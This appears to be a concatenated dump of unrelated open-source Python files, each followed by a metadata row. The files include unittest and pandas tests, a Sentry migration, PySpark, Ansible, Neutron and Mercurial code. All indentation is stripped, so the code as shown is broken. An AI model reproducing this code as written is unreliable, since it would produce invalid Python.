result._original_stderr = io.StringIO()
print('foo', file=sys.stdout)
if include_error:
print('bar', file=sys.stderr)
addFunction = getattr(result, add_attr)
addFunction(self, (None, None, None))
result.stopTest(self)
result_list = getattr(result, message_attr)
self.assertEqual(len(result_list), 1)
test, message = result_list[0]
expectedOutMessage = textwrap.dedent("""
Stdout:
foo
""")
expectedErrMessage = ''
if include_error:
expectedErrMessage = textwrap.dedent("""
Stderr:
bar
""")
expectedFullMessage = 'A traceback%s%s' % (expectedOutMessage, expectedErrMessage)
self.assertIs(test, self)
self.assertEqual(result._original_stdout.getvalue(), expectedOutMessage)
self.assertEqual(result._original_stderr.getvalue(), expectedErrMessage)
self.assertMultiLineEqual(message, expectedFullMessage)
def testBufferSetupClass(self):
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
@classmethod
def setUpClass(cls):
1/0
def test_foo(self):
pass
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
self.assertEqual(len(result.errors), 1)
def testBufferTearDownClass(self):
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
@classmethod
def tearDownClass(cls):
1/0
def test_foo(self):
pass
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
self.assertEqual(len(result.errors), 1)
def testBufferSetUpModule(self):
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
def test_foo(self):
pass
class Module(object):
@staticmethod
def setUpModule():
1/0
Foo.__module__ = 'Module'
sys.modules['Module'] = Module
self.addCleanup(sys.modules.pop, 'Module')
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
self.assertEqual(len(result.errors), 1)
def testBufferTearDownModule(self):
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
def test_foo(self):
pass
class Module(object):
@staticmethod
def tearDownModule():
1/0
Foo.__module__ = 'Module'
sys.modules['Module'] = Module
self.addCleanup(sys.modules.pop, 'Module')
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
self.assertEqual(len(result.errors), 1)
if __name__ == '__main__':
unittest.main()
| mit | -7,849,459,376,710,542,000 | 7,192,695,846,796,605,000 | 34.222727 | 94 | 0.601669 | false |
winklerand/pandas | pandas/tests/test_errors.py | 9 | 1147 | # -*- coding: utf-8 -*-
import pytest
from warnings import catch_warnings
import pandas # noqa
import pandas as pd
@pytest.mark.parametrize(
"exc", ['UnsupportedFunctionCall', 'UnsortedIndexError',
'OutOfBoundsDatetime',
'ParserError', 'PerformanceWarning', 'DtypeWarning',
'EmptyDataError', 'ParserWarning', 'MergeError'])
def test_exception_importable(exc):
from pandas import errors
e = getattr(errors, exc)
assert e is not None
# check that we can raise on them
with pytest.raises(e):
raise e()
def test_catch_oob():
from pandas import errors
try:
pd.Timestamp('15000101')
except errors.OutOfBoundsDatetime:
pass
def test_error_rename():
# see gh-12665
from pandas.errors import ParserError
from pandas.io.common import CParserError
try:
raise CParserError()
except ParserError:
pass
try:
raise ParserError()
except CParserError:
pass
with catch_warnings(record=True):
try:
raise ParserError()
except pd.parser.CParserError:
pass
| bsd-3-clause | 725,341,335,641,220,500 | 3,159,329,562,362,107,400 | 21.057692 | 64 | 0.634699 | false |
mr-c/common-workflow-language | v1.0/salad/schema_salad/tests/test_cli_args.py | 8 | 1199 | from __future__ import absolute_import
import unittest
import sys
import schema_salad.main as cli_parser
# for capturing print() output
from contextlib import contextmanager
from six import StringIO
@contextmanager
def captured_output():
new_out, new_err = StringIO(), StringIO()
old_out, old_err = sys.stdout, sys.stderr
try:
sys.stdout, sys.stderr = new_out, new_err
yield sys.stdout, sys.stderr
finally:
sys.stdout, sys.stderr = old_out, old_err
""" test different sets of command line arguments"""
class ParseCliArgs(unittest.TestCase):
def test_version(self):
args = [["--version"], ["-v"]]
for arg in args:
with captured_output() as (out, err):
cli_parser.main(arg)
response = out.getvalue().strip() # capture output and strip newline
self.assertTrue("Current version" in response)
def test_empty_input(self):
# running schema_salad tool wihtout any args
args = []
with captured_output() as (out, err):
cli_parser.main(args)
response = out.getvalue().strip()
self.assertTrue("error: too few arguments" in response)
| apache-2.0 | 1,940,569,490,076,599,800 | 130,690,207,704,001,700 | 28.243902 | 81 | 0.636364 | false |
NickPresta/sentry | src/sentry/migrations/0032_auto__add_eventmeta.py | 7 | 14351 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'GroupMeta'
db.create_table('sentry_groupmeta', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('group', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['sentry.Group'])),
('key', self.gf('django.db.models.fields.CharField')(max_length=64)),
('value', self.gf('django.db.models.fields.TextField')()),
))
db.send_create_signal('sentry', ['GroupMeta'])
# Adding unique constraint on 'GroupMeta', fields ['group', 'key', 'value']
db.create_unique('sentry_groupmeta', ['group_id', 'key'])
def backwards(self, orm):
# Removing unique constraint on 'GroupMeta', fields ['group', 'key', 'value']
db.delete_unique('sentry_groupmeta', ['group_id', 'key'])
# Deleting model 'GroupMeta'
db.delete_table('sentry_groupmeta')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'sentry.event': {
'Meta': {'object_name': 'Event', 'db_table': "'sentry_message'"},
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'db_column': "'view'", 'blank': 'True'}),
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True', 'db_column': "'message_id'"}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'event_set'", 'null': 'True', 'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
'logger': ('django.db.models.fields.CharField', [], {'default': "'root'", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'server_name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'db_index': 'True'}),
'site': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'db_index': 'True'}),
'time_spent': ('django.db.models.fields.FloatField', [], {'null': 'True'})
},
'sentry.filtervalue': {
'Meta': {'unique_together': "(('project', 'key', 'value'),)", 'object_name': 'FilterValue'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.group': {
'Meta': {'unique_together': "(('project', 'logger', 'culprit', 'checksum'),)", 'object_name': 'Group', 'db_table': "'sentry_groupedmessage'"},
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'db_column': "'view'", 'blank': 'True'}),
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
'logger': ('django.db.models.fields.CharField', [], {'default': "'root'", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'time_spent_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'time_spent_total': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1', 'db_index': 'True'}),
'views': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.View']", 'symmetrical': 'False', 'blank': 'True'})
},
'sentry.groupmeta': {
'Meta': {'unique_together': "(('group', 'key', 'value'),)", 'object_name': 'GroupMeta'},
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'value': ('django.db.models.fields.TextField', [], {})
},
'sentry.messagecountbyminute': {
'Meta': {'unique_together': "(('project', 'group', 'date'),)", 'object_name': 'MessageCountByMinute'},
'date': ('django.db.models.fields.DateTimeField', [], {}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'time_spent_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'time_spent_total': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'sentry.messagefiltervalue': {
'Meta': {'unique_together': "(('project', 'key', 'value', 'group'),)", 'object_name': 'MessageFilterValue'},
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.messageindex': {
'Meta': {'unique_together': "(('column', 'value', 'object_id'),)", 'object_name': 'MessageIndex'},
'column': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'sentry.project': {
'Meta': {'object_name': 'Project'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'owned_project_set'", 'null': 'True', 'to': "orm['auth.User']"}),
'public': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'})
},
'sentry.projectdomain': {
'Meta': {'unique_together': "(('project', 'domain'),)", 'object_name': 'ProjectDomain'},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'domain_set'", 'to': "orm['sentry.Project']"})
},
'sentry.projectmember': {
'Meta': {'unique_together': "(('project', 'user'),)", 'object_name': 'ProjectMember'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'member_set'", 'to': "orm['sentry.Project']"}),
'public_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'secret_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'type': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'project_set'", 'to': "orm['auth.User']"})
},
'sentry.projectoption': {
'Meta': {'unique_together': "(('project', 'key', 'value'),)", 'object_name': 'ProjectOption', 'db_table': "'sentry_projectoptions'"},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']"}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.view': {
'Meta': {'object_name': 'View'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'path': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'verbose_name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'verbose_name_plural': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'})
}
}
complete_apps = ['sentry']
| bsd-3-clause | -4,734,808,023,905,289,000 | 3,127,048,765,870,081,000 | 75.743316 | 182 | 0.54714 | false |
skonto/spark | python/pyspark/mllib/stat/KernelDensity.py | 118 | 1997 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys
if sys.version > '3':
xrange = range
import numpy as np
from pyspark.mllib.common import callMLlibFunc
from pyspark.rdd import RDD
class KernelDensity(object):
"""
Estimate probability density at required points given an RDD of samples
from the population.
>>> kd = KernelDensity()
>>> sample = sc.parallelize([0.0, 1.0])
>>> kd.setSample(sample)
>>> kd.estimate([0.0, 1.0])
array([ 0.12938758, 0.12938758])
"""
def __init__(self):
self._bandwidth = 1.0
self._sample = None
def setBandwidth(self, bandwidth):
"""Set bandwidth of each sample. Defaults to 1.0"""
self._bandwidth = bandwidth
def setSample(self, sample):
"""Set sample points from the population. Should be a RDD"""
if not isinstance(sample, RDD):
raise TypeError("samples should be a RDD, received %s" % type(sample))
self._sample = sample
def estimate(self, points):
"""Estimate the probability density at points"""
points = list(points)
densities = callMLlibFunc(
"estimateKernelDensity", self._sample, self._bandwidth, points)
return np.asarray(densities)
| apache-2.0 | -8,330,590,797,848,630,000 | 7,114,226,807,353,699,000 | 32.847458 | 82 | 0.684527 | false |
kvar/ansible | test/units/modules/network/cnos/test_cnos_logging.py | 23 | 2268 | #
# (c) 2018 Red Hat Inc.
# Copyright (C) 2017 Lenovo.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from units.compat.mock import patch
from ansible.modules.network.cnos import cnos_logging
from units.modules.utils import set_module_args
from .cnos_module import TestCnosModule, load_fixture
class TestCnosLoggingModule(TestCnosModule):
module = cnos_logging
def setUp(self):
super(TestCnosLoggingModule, self).setUp()
self.mock_get_config = patch('ansible.modules.network.cnos.cnos_logging.get_config')
self.get_config = self.mock_get_config.start()
self.mock_load_config = patch('ansible.modules.network.cnos.cnos_logging.load_config')
self.load_config = self.mock_load_config.start()
def tearDown(self):
super(TestCnosLoggingModule, self).tearDown()
self.mock_get_config.stop()
self.mock_load_config.stop()
def load_fixtures(self, commands=None):
self.get_config.return_value = load_fixture('cnos_logging_config.cfg')
self.load_config.return_value = None
def test_cnos_logging_buffer_size_changed_implicit(self):
set_module_args(dict(dest='logfile', name='anil'))
commands = ['logging logfile anil 5 size 10485760']
self.execute_module(changed=True, commands=commands)
def test_cnos_logging_logfile_size_changed_explicit(self):
set_module_args(dict(dest='logfile', name='anil', level='4', size=6000))
commands = ['logging logfile anil 4 size 6000']
self.execute_module(changed=True, commands=commands)
| gpl-3.0 | -7,817,732,926,606,891,000 | -2,886,349,225,147,480,000 | 36.8 | 94 | 0.715168 | false |
eayunstack/neutron | neutron/tests/unit/extension_stubs.py | 5 | 2334 | # Copyright 2011 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
from neutron_lib.api import extensions as api_extensions
from neutron_lib.services import base
from neutron import wsgi
class StubExtension(api_extensions.ExtensionDescriptor):
def __init__(self, alias="stub_extension", optional=None):
self.alias = alias
self.optional = optional or []
def get_name(self):
return "Stub Extension"
def get_alias(self):
return self.alias
def get_description(self):
return ""
def get_updated(self):
return ""
def get_optional_extensions(self):
return self.optional
class StubExtensionWithReqs(StubExtension):
def get_required_extensions(self):
return ["foo"]
class StubPlugin(object):
def __init__(self, supported_extensions=None):
supported_extensions = supported_extensions or []
self.supported_extension_aliases = supported_extensions
class ExtensionExpectingPluginInterface(StubExtension):
"""Expect plugin to implement all methods in StubPluginInterface.
This extension expects plugin to implement all the methods defined
in StubPluginInterface.
"""
def get_plugin_interface(self):
return StubPluginInterface
class StubPluginInterface(base.ServicePluginBase):
@abc.abstractmethod
def get_foo(self, bar=None):
pass
def get_plugin_type(self):
pass
def get_plugin_description(self):
pass
class StubBaseAppController(wsgi.Controller):
def index(self, request):
return "base app index"
def show(self, request, id):
return {'fort': 'knox'}
def update(self, request, id):
return {'uneditable': 'original_value'}
| apache-2.0 | -3,177,684,949,907,701,000 | 4,301,359,875,283,028,500 | 24.369565 | 78 | 0.692374 | false |
richardcs/ansible | lib/ansible/modules/cloud/azure/azure_rm_virtualnetwork_facts.py | 7 | 5178 | #!/usr/bin/python
#
# Copyright (c) 2016 Matt Davis, <[email protected]>
# Chris Houseknecht, <[email protected]>
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: azure_rm_virtualnetwork_facts
version_added: "2.1"
short_description: Get virtual network facts.
description:
- Get facts for a specific virtual network or all virtual networks within a resource group.
options:
name:
description:
- Only show results for a specific security group.
resource_group:
description:
- Limit results by resource group. Required when filtering by name.
tags:
description:
- Limit results by providing a list of tags. Format tags as 'key' or 'key:value'.
extends_documentation_fragment:
- azure
author:
- "Chris Houseknecht (@chouseknecht) <[email protected]>"
- "Matt Davis (@nitzmahone) <[email protected]>"
'''
EXAMPLES = '''
- name: Get facts for one virtual network
azure_rm_virtualnetwork_facts:
resource_group: Testing
name: secgroup001
- name: Get facts for all virtual networks
azure_rm_virtualnetwork_facts:
resource_group: Testing
- name: Get facts by tags
azure_rm_virtualnetwork_facts:
tags:
- testing
'''
RETURN = '''
azure_virtualnetworks:
description: List of virtual network dicts.
returned: always
type: list
example: [{
"etag": 'W/"532ba1be-ae71-40f2-9232-3b1d9cf5e37e"',
"id": "/subscriptions/XXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXX/resourceGroups/Testing/providers/Microsoft.Network/virtualNetworks/vnet2001",
"location": "eastus2",
"name": "vnet2001",
"properties": {
"addressSpace": {
"addressPrefixes": [
"10.10.0.0/16"
]
},
"provisioningState": "Succeeded",
"resourceGuid": "a7ba285f-f7e7-4e17-992a-de4d39f28612",
"subnets": []
},
"type": "Microsoft.Network/virtualNetworks"
}]
'''
try:
from msrestazure.azure_exceptions import CloudError
except:
# This is handled in azure_rm_common
pass
from ansible.module_utils.azure_rm_common import AzureRMModuleBase
AZURE_OBJECT_CLASS = 'VirtualNetwork'
class AzureRMNetworkInterfaceFacts(AzureRMModuleBase):
def __init__(self):
self.module_arg_spec = dict(
name=dict(type='str'),
resource_group=dict(type='str'),
tags=dict(type='list'),
)
self.results = dict(
changed=False,
ansible_facts=dict(azure_virtualnetworks=[])
)
self.name = None
self.resource_group = None
self.tags = None
super(AzureRMNetworkInterfaceFacts, self).__init__(self.module_arg_spec,
supports_tags=False,
facts_module=True)
def exec_module(self, **kwargs):
for key in self.module_arg_spec:
setattr(self, key, kwargs[key])
if self.name is not None:
self.results['ansible_facts']['azure_virtualnetworks'] = self.get_item()
else:
self.results['ansible_facts']['azure_virtualnetworks'] = self.list_items()
return self.results
def get_item(self):
self.log('Get properties for {0}'.format(self.name))
item = None
results = []
try:
item = self.network_client.virtual_networks.get(self.resource_group, self.name)
except CloudError:
pass
if item and self.has_tags(item.tags, self.tags):
results = [self.serialize_obj(item, AZURE_OBJECT_CLASS)]
return results
def list_resource_group(self):
self.log('List items for resource group')
try:
response = self.network_client.virtual_networks.list(self.resource_group)
except CloudError as exc:
self.fail("Failed to list for resource group {0} - {1}".format(self.resource_group, str(exc)))
results = []
for item in response:
if self.has_tags(item.tags, self.tags):
results.append(self.serialize_obj(item, AZURE_OBJECT_CLASS))
return results
def list_items(self):
self.log('List all for items')
try:
response = self.network_client.virtual_networks.list_all()
except CloudError as exc:
self.fail("Failed to list all items - {0}".format(str(exc)))
results = []
for item in response:
if self.has_tags(item.tags, self.tags):
results.append(self.serialize_obj(item, AZURE_OBJECT_CLASS))
return results
def main():
AzureRMNetworkInterfaceFacts()
if __name__ == '__main__':
main()
| gpl-3.0 | 7,913,536,899,729,341,000 | -2,557,707,425,947,419,600 | 27.607735 | 141 | 0.591541 | false |
benvand/alexa-stackoverflow | strings.py | 1 | 1340 | """Strings for Alexa to say"""
from settings import SITE_NAME_SPEAKABLE
SITE_NAME = SITE_NAME_SPEAKABLE
# Breaks
BREAK = '<break strength="{strength}">'
XS_BREAK = BREAK.format(strength='x-strong')
S_BREAK = BREAK.format(strength='strong')
# Greet and dismiss
WELCOME_REPROMPT = \
"""
You can ask {site_name} for an answer to a question.
For example, try, Ask {site_name}{break1} what is node j s.
""".format(site_name=SITE_NAME, break1=S_BREAK)
WELCOME = ("Welcome to the Alexa {site_name} Skill. " + WELCOME_REPROMPT).format(site_name=SITE_NAME)
GOODBYE = "Thank you for trying the Alexa {site_name} app.".format(site_name=SITE_NAME)
# Report of what has been found
REPORT_ON_QUESTION = "The closest question match on " + SITE_NAME + ' is {question}...'
REPORT_ON_ANSWER = "The top rated answer for that question by {answerer} with {votes} upvotes is {answer}."
REPORT = S_BREAK.join([REPORT_ON_QUESTION, REPORT_ON_ANSWER])
# Failure to parse and reprompt
FAILURE = "I'm sorry, I didn't catch your question. Please try again."
PROMPT_ASK = "Your questions will be relayed to {site_name}.".format(site_name=SITE_NAME)
# Nothing found responses
NO_QUESTIONS = "I'm sorry, that didn't return any results on {site_name}.".format(site_name=SITE_NAME)
NO_ANSWERS = NO_QUESTIONS + "However there is a question waiting to be answered."
| mit | -4,874,909,931,199,056,000 | 8,310,752,169,406,482,000 | 37.285714 | 107 | 0.723881 | false |
seewindcn/tortoisehg | src/mercurial/ui.py | 1 | 45732 | # ui.py - user interface bits for mercurial
#
# Copyright 2005-2007 Matt Mackall <[email protected]>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
from __future__ import absolute_import
import errno
import getpass
import inspect
import os
import re
import socket
import sys
import tempfile
import traceback
from .i18n import _
from .node import hex
from . import (
config,
error,
formatter,
progress,
scmutil,
util,
)
samplehgrcs = {
'user':
"""# example user config (see "hg help config" for more info)
[ui]
# name and email, e.g.
# username = Jane Doe <[email protected]>
username =
[extensions]
# uncomment these lines to enable some popular extensions
# (see "hg help extensions" for more info)
#
# pager =
# progress =
# color =""",
'cloned':
"""# example repository config (see "hg help config" for more info)
[paths]
default = %s
# path aliases to other clones of this repo in URLs or filesystem paths
# (see "hg help config.paths" for more info)
#
# default-push = ssh://[email protected]/hg/jdoes-fork
# my-fork = ssh://[email protected]/hg/jdoes-fork
# my-clone = /home/jdoe/jdoes-clone
[ui]
# name and email (local to this repository, optional), e.g.
# username = Jane Doe <[email protected]>
""",
'local':
"""# example repository config (see "hg help config" for more info)
[paths]
# path aliases to other clones of this repo in URLs or filesystem paths
# (see "hg help config.paths" for more info)
#
# default = http://example.com/hg/example-repo
# default-push = ssh://[email protected]/hg/jdoes-fork
# my-fork = ssh://[email protected]/hg/jdoes-fork
# my-clone = /home/jdoe/jdoes-clone
[ui]
# name and email (local to this repository, optional), e.g.
# username = Jane Doe <[email protected]>
""",
'global':
"""# example system-wide hg config (see "hg help config" for more info)
[extensions]
# uncomment these lines to enable some popular extensions
# (see "hg help extensions" for more info)
#
# blackbox =
# progress =
# color =
# pager =""",
}
class ui(object):
def __init__(self, src=None):
# _buffers: used for temporary capture of output
self._buffers = []
# 3-tuple describing how each buffer in the stack behaves.
# Values are (capture stderr, capture subprocesses, apply labels).
self._bufferstates = []
# When a buffer is active, defines whether we are expanding labels.
# This exists to prevent an extra list lookup.
self._bufferapplylabels = None
self.quiet = self.verbose = self.debugflag = self.tracebackflag = False
self._reportuntrusted = True
self._ocfg = config.config() # overlay
self._tcfg = config.config() # trusted
self._ucfg = config.config() # untrusted
self._trustusers = set()
self._trustgroups = set()
self.callhooks = True
if src:
self.fout = src.fout
self.ferr = src.ferr
self.fin = src.fin
self._tcfg = src._tcfg.copy()
self._ucfg = src._ucfg.copy()
self._ocfg = src._ocfg.copy()
self._trustusers = src._trustusers.copy()
self._trustgroups = src._trustgroups.copy()
self.environ = src.environ
self.callhooks = src.callhooks
self.fixconfig()
else:
self.fout = sys.stdout
self.ferr = sys.stderr
self.fin = sys.stdin
# shared read-only environment
self.environ = os.environ
# we always trust global config files
for f in scmutil.rcpath():
self.readconfig(f, trust=True)
def copy(self):
return self.__class__(self)
def formatter(self, topic, opts):
return formatter.formatter(self, topic, opts)
def _trusted(self, fp, f):
st = util.fstat(fp)
if util.isowner(st):
return True
tusers, tgroups = self._trustusers, self._trustgroups
if '*' in tusers or '*' in tgroups:
return True
user = util.username(st.st_uid)
group = util.groupname(st.st_gid)
if user in tusers or group in tgroups or user == util.username():
return True
if self._reportuntrusted:
self.warn(_('not trusting file %s from untrusted '
'user %s, group %s\n') % (f, user, group))
return False
def readconfig(self, filename, root=None, trust=False,
sections=None, remap=None):
try:
fp = open(filename)
except IOError:
if not sections: # ignore unless we were looking for something
return
raise
cfg = config.config()
trusted = sections or trust or self._trusted(fp, filename)
try:
